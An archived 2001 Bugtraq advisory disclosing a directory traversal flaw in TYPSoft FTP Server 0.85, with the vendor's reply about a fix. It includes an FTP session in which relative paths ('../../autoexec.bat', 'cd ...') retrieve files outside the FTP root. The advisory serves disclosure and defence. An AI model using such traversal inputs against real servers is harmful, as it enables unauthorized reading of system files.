Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Vulnerability in TYPSoft FTP Server

From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:27:57 -0500
----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerability in TYPSoft FTP Server



    Overview

TYPSoft FTP Server v0.85 is an ftp server available from
http://www.webmasterfree.com and http://typsoft.n3.net.  A vulnerability
exists which allows a remote attacker to break out of the ftp root using
relative paths (ie: '...').



    Details

The following is an illustration of the problem:


% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220 TYPSoft FTP Server 0.85 ready...
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> pwd
257 "/C:/directory/directory/" is current directory.
ftp> get ../../autoexec.bat
200 Port command successful.
150 Opening data connection for ../../autoexec.bat.
226 Transfer complete.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp> cd ..
501 CWD failed. No permission
ftp> cd ...
250 CWD command successful. "/C:/directory/directory/.../" is current directory.
ftp> pwd
257 "/C:/directory/directory/.../" is current directory.
ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 Transfer complete.
ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
ftp>



    Solution


Date: Sat, 24 Feb 2001 01:39:23 -0500
Subject: Re: Vulnerability in TYPSoft FTP Server
From: TYPSoft <typsoft () altern org>
To: joetesta () hushmail com

Hi
I have try to fix this problem.
I test I have made seem to be OK.
Thanks for the report

Marc
TYPSoft



    Unfortunately, I do not have the resources to verify this fix at
this time.  Thus, I urge users to proceed with caution.



    Vendor Status

TYPSoft was contacted via <typsoft () altern org> on Wednesday, February
21, 2001.



    - Joe Testa  ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )


----- Begin Hush Signature v1.3 -----
CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv
k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/
sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu
I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/
yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc
y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK
YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf
g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com
Previous By Date Next
Previous By Thread Next

Current thread: